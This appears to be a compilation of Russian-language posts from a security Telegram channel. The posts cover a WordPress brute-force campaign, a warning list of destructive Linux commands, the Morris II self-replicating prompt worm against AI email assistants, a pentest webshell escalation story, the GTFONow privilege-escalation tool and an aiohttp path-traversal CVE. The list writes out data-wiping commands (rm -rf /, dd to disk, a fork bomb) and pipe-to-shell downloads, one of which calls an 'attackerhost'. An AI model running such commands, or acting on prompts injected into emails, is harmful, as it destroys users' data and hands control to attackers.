💻 Массовые аттаки на сайты WordPress

Sucuri предупреждает, что хакеры проводят атаки на сайты под управлением WordPress и внедряют скрипты, которые заставляют брутфорсить пароли для других сайтов.

Стоящие за этим хакеры обычно взламывают сайты, чтобы внедрять на них скрипты для угона криптокошельков. Их скрипты отображают мошеннические сообщения. Если человек попадается, скрипты похищают все активы в его кошельке.

Обычно хакеры использовали сайты на WordPress, внедряя на них AngelDrainer. Атаки осуществлялись несколькими волнами с различных URL, последним был dynamiclink[.]lol/cachingjs/turboturbo.js.

Однако теперь мошенники используют браузеры посетителей для брутфорса других WordPress-сайтов, применяя для этого вредоносный скрипт с недавно зарегистрированного домена dynamic-linx[.]com/chx.js.

То есть злоумышленники взламывают сайт под управлением WordPress и внедряют в его HTML-шаблоны вредоносный код. Когда посетители заходят на такой сайт, в их браузер загружаются скрипты с https://dynamic-linx[.]com/chx.js.

Эти скрипты вынуждают браузеры жертв связываться с сервером хакеров (https://dynamic-linx[.]com/getTask.php) и получать задание на перебор паролей. Оно поставляется в виде JSON-файла, содержащего необходимые параметры для атаки: ID, URL сайта, имя учетной записи, число, обозначающее текущую партию паролей для перебора, а также сто паролей для пробы.

При получении задания браузер жертвы загружает файл через XMLRPC-интерфейс WordPress, используя имя учетной записи и пароль из JSON. Если пароль подобран правильно, скрипт уведомит своих операторов о том, что пароль для сайта найден.

По данным PublicHTML, в настоящее время такими скриптами заражены более 1700 сайтов. К примеру, в числе взломанных ресурсов можно найти даже сайт Ассоциации частных банков Эквадора.

@linuxkalii

💻 Никогда не запускай эти 10+ команд Linux

Обожаю Linux за его гибкость и безграничные возможности)

🗄rm -rf / – Эта команда удалит все файлы и папки на вашем компьютере.

🗄:(){ :|: & };: – Это команда, также известная как "fork bomb", может вызвать переполнение памяти на вашем компьютере и привести к аварийному завершению системы.

🗄mkfs.ext4 /dev/sda – Эта команда форматирует жесткий диск без какого-либо предупреждения или подтверждения. Все данные будут утеряны.

🗄dd if=/dev/random of=/dev/sda – Эта команда перезапишет все данные на жестком диске случайными значениями, что приведет к потере данных.

🗄chmod 777 / – Эта команда откроет полный доступ к вашей файловой системе для всех пользователей, что может привести к нарушению безопасности.

🗄mv /home/* /dev/null – Эта команда переместит все файлы в вашей домашней директории в "null", короче, они будут утеряны.

🗄wget http://example.com/file -O /dev/null – Эта команда загрузит файл и перезапишет все данные в "null", что приведет к потере данных.

🗄mkfs.ext4 /dev/sda1 – Эта команда форматирует раздел жесткого диска без какого-либо предупреждения или подтверждения. Все данные на этом разделе будут утеряны.

🗄ln -s /dev/null /etc/passwd – Эта команда создаст символическую ссылку на "/etc/passwd" в "null", что приведет к потере данных.

🗄echo "Hello" > /dev/sda – это заменит ваш раздел, содержащий все данные, необходимые для загрузки системы, строкой «Hello».

🗄wget http://malicious_source -O- | sh – Такие команды будут загружать и запускать в вашей системе вредоносные сценарии, которые могут подорвать безопасность вашей системы.

В общем, берите ненужный комп — и да начнётся веселье

@linuxkalii

💻 Нейросетевой червь —
— новая гроза почтовых клиентов с AI-фичами

Группа исследователей из Израильского технологического института и компании Intuit разработали червя Morris II, который заточен на атаки нейросетевых приложений и почтовых клиентов с поддержкой нейросетевых функций. Morris II способен красть личные данные, внедрять вредоносное ПО, спамить пользователей и распространяться через несколько связанных сервисов.

Исследование демонстрирует, что злоумышленники могут использовать запросы (например, в обычном письме), которые при обработке генеративной нейросетью заставляют её воспроизводить входные данные в качестве выходных и совершать вредоносные действия. Червь был протестирован против трёх различных моделей — Gemini Pro, ChatGPT 4.0 и LLaVA, а также оценены различные факторы (например, скорость распространения, репликация, вредоносная активность), влияющие на его эффективность.

В данный момент речь идёт о научном исследовании в искусственно созданной среде, и, по словам авторов, пока нет признаков того, что подобные черви уже действуют в интернете, но это лишь вопрос времени. Команда сообщила о своих результатах в Google и OpenAI.

📎 Подробнее можно почитать тут

@linuxkalii

💻 Держите, дерево всевозможных аттак на Windows

На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою Windows, а иначе для чего это всё
Ну вы понимаете)

@linuxkalii

💻 Инфраструктурный пентест по шагам: сканирование и получение доступа

Годная статья, в которой описываются разные техники повышения привилегий и закрепления в системе.

⏩Например, вот так рассказывается, как получить доступ на запись в папку веб-сервера.
— «На одном из недавних проектов мы обнаружили возможность записывать данные в папку веб-сервера IIS без авторизации. Мы сделали ASPX-файл, загрузили его на сервер и обратились к нему через браузер. Таким образом мы получили возможность исполнять команды в рамках контекста веб-сервера, а он, так же, как MS SQL, имеет привилегию имперсонализации. Мы сделали имперсонализацию и поднялись до системных привилегий. Создали себе учетную запись, зашли на этот веб-сервер через парадную дверь и начали продвигаться по инфраструктуре.»

⏩В целом в статье довольно много полезностей, рекомендую

📎 Статья

@linuxkalii

💻 Новые WebTunnel мосты Tor имитируют HTTPS-трафик

Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.

🗄Напомним, что мосты Tor представляют собой ретрансляторы, не перечисленные в публичном каталоге Tor, которые позволяют маскировать соединения пользователей. Так как уже довольно давно найдены способы обнаружения и блокировки таких соединения (например, в Китае), Tor также использует мосты obfsproxy, которые добавляют дополнительный уровень обфускации.

🗄Как рассказывают разработчики, мосты WebTunnel предназначены для имитации зашифрованного трафика (HTTPS) и основаны на HTTPT. Они оборачивают полезную нагрузку соединения в WebSocket-подобное HTTPS-соединение, которое выглядит как обычный HTTPS (WebSocket).То есть для стороннего наблюдателя это обычное HTTP-соединение, в ходе которого пользователь просто просматривает веб-страницы.

🗄Отмечается, что тестирование WebTunnel началось еще в летом 2023 года. В настоящее время по всему миру работают около 60 мостов WebTunnel, и около 700 активных пользователей ежедневно используют новые мосты на разных платформах. Однако пока WebTunnel работает не во всех регионах, а адрес мостов нужно получать вручную, что планируют доработать в будущем.

@linuxkalii

💻 В этом посте поговорим об инструменте `GTFONow`

Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.

Основные особенности:
🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo.
🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС.
🗄Автоматическая эксплуатация через SSH‑ключи.
🗄Автоматическая эксплуатация через файл используемый в cron.
🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python

🖥 GTFONow

@linuxkalii

😠 Bloodhound - набор аналитических инструментов с открытым исходным кодом (OSINT), предназначенных для отслеживания жертв торговли людьми и различных правонарушителей.

Все инструменты и ссылки бесплатны и постоянно обновляются.

🔗 https://colliertr.github.io/OSINT-dashboard/

#OSINT #OSINT4Good

@linuxkalii

💻 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров

🗄Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

🗄aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

🗄В конце января 2024 года aiohttp обновилась до версии 3.9.2, в которой устранили уязвимость CVE-2024-23334. Это path traversal баг, затрагивающий все версии aiohttp (начиная с 3.9.1) и старше, который позволяет удаленным злоумышленникам без авторизации получить доступ к файлам на уязвимых серверах.

🗄Проблема связана с недостаточной проверкой при установке follow_symlinks в значение True для статичных маршрутов, что позволяет получить несанкционированный доступ к файлам за пределами статичного корневого каталога сервера.

🗄В конце февраля текущего года на GitHub появился PoC-эксплоит для CVE-2024-23334, а в начале марта на YouTube было опубликовано подробное видеоруководство по эксплуатации бага.

🗄Как теперь сообщают аналитики компании Cyble, их сканеры обнаруживают попытки эксплуатации CVE-2024-23334 начиная с 29 февраля, и атаки лишь усилились в марте. В основном попытки сканирования исходят с пяти IP-адресов, один из которых ранее был отмечен в отчете Group-IB и связан с вымогательской группировкой ShadowSyndicate.

@linuxkalii